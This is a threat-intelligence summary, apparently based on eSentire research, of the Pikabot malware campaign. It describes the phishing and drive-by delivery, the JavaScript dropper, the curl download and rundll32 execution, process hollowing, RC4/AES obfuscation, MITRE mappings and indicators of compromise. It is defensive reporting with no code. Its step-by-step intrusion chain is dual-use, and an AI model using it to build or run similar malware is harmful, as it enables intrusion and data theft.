The Rising Threat of Pikabot

Threat researchers at eSentire document Pikabot, a malware campaigns impacting manufacturing and business services with layered encryption and anti-analysis features, including phishing, JavaScript droppers, and process hollowing. The activity shows how Pikabot hides in encrypted payloads, injects into a Windows process, and exfiltrates host information while avoiding execution in certain locales.
#PikaBot #AnyDesk

Keypoints

Pikabot activity observed since October 2023, affecting manufacturing and business services sectors.
Initial infection via phishing emails containing a link to download a ZIP archive with an obfuscated JavaScript dropper.
Downloader retrieves a DAT file from URLs via curl, renames it to Wiflgodjvo.dll, and executes it using rundll32.exe with export “Enter”.
PikaBot injects into SearchProtocolHost.exe via process hollowing (T1055.012) and uses RC4/AES to obfuscate and decrypt strings and C2 data.
Payload gathers host information (netstat, ipconfig, whoami) and includes a language check that halts execution if the system language is Russian or Ukrainian.
Drive-by download attempts via malicious pages (e.g., AnyDesk-themed page) and domain impersonation of Slack/Zoom disclosed; mutex prevents reinfection.

MITRE Techniques

[T1566.002] Spearphishing Link – The initial infection stems from an email containing a link to download a ZIP archive. “The initial infection stems from an email containing a link to download a ZIP archive”
[T1059.007] Command and Scripting Interpreter: JavaScript – An obfuscated JavaScript file in the ZIP is responsible for infection when executed. “which in turn, contains an obfuscated JavaScript file responsible for infecting the device when executed by the user.”
[T1105] Ingress Tool Transfer – The malware retrieves the malicious .DAT file from URLs via curl, then renames it to Wiflgodjvo.dll. “it retrieves the malicious .DAT file from URLs (1,2,5) via curl. Upon successful retrieval of the malicious file, it gets renamed to Wiflgodjvo.dll.”
[T1218.001] Signed Binary Proxy Execution: Rundll32 – The malicious DLL runs with rundll32.exe and an export name “Enter”. “The malicious DLL file then runs with rundll32.exe and an export name “Enter””
[T1055.012] Process Injection: Process Hollowing – PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012). “PikaBot is injected into the SearchProtocolHost.exe process via the process hollowing technique (T1055.012).”
[T1027] Obfuscated/Compressed Files and Information – Inline RC4 encryption to obfuscate strings and AES decryption with RC4-encrypted key/IV. “The inline RC4 encryption in Pikabot is used to obfuscate its strings, … ” and “The RC4-decrypted base64-encoded strings then go through another decryption layer with AES.”
[T1082] System Information Discovery – The payload gathers basic host information and checks system language; language check halts execution for Russian/Ukrainian. “The payload examines the language setting of the infected system, and if it detects that the system is set to Russian or Ukrainian, it refrains from executing any further code.”
[T1189] Drive-by Compromise – Drive-by download example via malicious AnyDesk-related page. “In this instance, the client searched for AnyDesk installer and stumbled across the malicious page …”
[T1036] Masquerading – Domains impersonating Slack and Zoom used to host or distribute payload. “Pivoting with VirusTotal, we found another two domains impersonating Slack and Zoom.”

Indicators of Compromise

[Domain] anadesky.firstbasedso[.]com – drive-by download page delivering the malicious MSI installer. “malicious page anadesky.firstbasedso[.]com”
[File] Wiflgodjvo.dll – payload DLL renamed from a downloaded DAT file.
[Process] SearchProtocolHost.exe – process into which Pikabot injects via process hollowing.
[Mutex] {C1E8A9B1-57F0-47B0-AB93-C739C6592C5F} – hardcoded mutex to prevent reinfection.
[File] Malicious MSI installer signed by “The New Print Shop LTD” – drive-by delivery of signed MSI.
[Domain] two domains impersonating Slack and Zoom – used for deception/malware distribution.